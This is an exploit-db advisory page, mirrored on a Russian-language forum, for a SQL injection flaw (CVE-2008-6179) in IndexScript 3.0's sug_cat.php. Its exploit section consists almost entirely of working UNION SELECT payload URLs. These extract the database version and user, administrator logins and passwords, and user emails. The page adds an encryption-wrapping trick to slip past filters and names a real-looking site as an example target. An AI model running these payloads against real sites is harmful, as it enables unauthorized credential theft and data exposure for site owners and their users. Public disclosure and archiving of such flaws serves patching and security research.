- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 6746
- Проверка EDB
-
- Пройдено
- Автор
- D3V1L
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6179
- Дата публикации
- 2008-10-13
Код:
[~]-------------------------------------------------------------------------------------------------------------
[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
[~]
[~] http://www.indexscript.com/download.php
[~]
[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] [email protected] http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig AND milw0rm staff
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
[~]
[~] Example :-
[~]
[~] http://spaceho.com/sug_cat.php?parent_id=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
[~]-------------------------------------------------------------------------------------------------------------
# milw0rm.com [2008-10-13]- Источник
- www.exploit-db.com
